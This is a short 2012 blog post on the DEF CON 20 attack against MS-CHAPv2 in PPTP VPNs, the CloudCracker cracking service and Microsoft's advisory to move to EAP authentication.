Tuesday, August 28, 2012

Is your VPN secure? The answer might surprise you!

During DEF CON 20 a new attack against the MS-CHAP 2 protocol was announced that basically reduces the complexity of cracking a MS-CHAP login down to a single DES 56 bit brute force attack. The announcers also combined this with a new services on the site CloudCracker which will handily brute force this DES for you in less than 24 hours.

The input required is a network capture of the MS-CHAP 2 handshake. For now there are a few manual steps, but they shouldn't be beyond anybody with a basic understanding of networks and using command line tools. The payoff is huge though, once you have the cracked token you can both listen in on any subsequent traffic from the authenticated user and also authenticate as the user yourself.

CHAP authentication is currently used in almost all PPTP VPN networks (It is usually the default authentication). It is also often used in enterprise WiFi authentication but there the handshake is already encrypted using TLS so the attack is usually not possible in this case.

Microsoft has put out a security advisory (Although they are by no means the only affected vendor) advising everybody to switch to EAP authentication for PPTP. However the change is not an easy one since it needs to be configured both on the client and the server side of the VPN tunnel.

No comments: